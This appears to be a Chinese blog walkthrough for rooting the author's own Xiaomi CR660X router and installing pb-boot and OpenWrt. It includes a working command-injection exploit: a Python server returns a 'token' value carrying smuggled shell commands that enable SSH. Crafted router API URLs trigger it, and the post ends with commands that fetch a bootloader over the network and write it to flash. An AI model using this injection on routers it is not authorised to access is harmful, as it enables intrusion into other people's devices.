嗯 ta的价格还是50没有变!!!

解锁

按照解释说 如果获取不到ip时 会把自己ip设为 169.254.31.2 并且去 169.254.31.1 拉去参数并执行

那么 在 archlinux 中可以用 linux-wifi-hotspot 提供的 create_ap 快捷创建热点

当然 要先停止 NetworkManager 服务

首先 开热点

1
create_ap wlan0 lo ap 12345678 -g 169.254.31.1 --no-dnsmasq -dd

再启动一个拉参数的服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from http.server import BaseHTTPRequestHandler, HTTPServer
import json


class SimpleServer(BaseHTTPRequestHandler):
    def do_POST(self):
        print("It comes!")
        data = {
            "code": 0,
            "token": "; nvram set ssh_en=1; nvram commit; sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/dropbear start;"
        }
        self.send_response(200)
        self.end_headers()
        self.wfile.write(json.dumps(data).encode())


server_address = ('0.0.0.0', 80)
httpd = HTTPServer(server_address, SimpleServer)
httpd.serve_forever()

运行 python server.py 启动服务

再去访问

  • http://<CR660X设备IP>/cgi-bin/luci/;stok=<获取到的stok>/api/misystem/extendwifi_connect?ssid=ap&password=12345678

可以看到日志有

1
2
3
4
5
6
wlan0: STA aa:bb:cc:b2:b2:cc IEEE 802.11: authenticated
wlan0: STA aa:bb:cc:b2:b2:cc IEEE 802.11: associated (aid 1)
wlan0: AP-STA-CONNECTED aa:bb:cc:b2:b2:cc
wlan0: STA aa:bb:cc:b2:b2:cc RADIUS: starting accounting session F94929848293082E
wlan0: STA aa:bb:cc:b2:b2:cc WPA: pairwise key handshake completed (RSN)
wlan0: EAPOL-4WAY-HS-COMPLETED aa:bb:cc:b2:b2:cc
  • http://<CR660X设备IP>/cgi-bin/luci/;stok=<获取到的stok>/api/xqsystem/oneclick_get_remote_token?username=xxx&password=xxx&nonce=xxx
1
2
It comes!
169.254.31.2 - - [24/Jun/2025 20:34:47] "POST /cgi-bin/luci/api/xqsystem/token HTTP/1.1" 200 -

至此 ssh 已经解锁

刷入 breedbpboot

1
2
3
cd /tmp/
wget http://169.254.31.1:3000/pb-boot.img
mtd write pb-boot.img Bootloader

以网线模式插入 lan 口 进入页面

刷 wrt 并优化

先在 pb-boot 刷入 openwrt-24.10.1-ramips-mt7621-xiaomi_mi-router-cr6608-initramfs-kernel.bin

以空密码登录后 再刷入 openwrt-24.10.1-ramips-mt7621-xiaomi_mi-router-cr6608-squashfs-sysupgrade.bin

国内源

主题

参考地址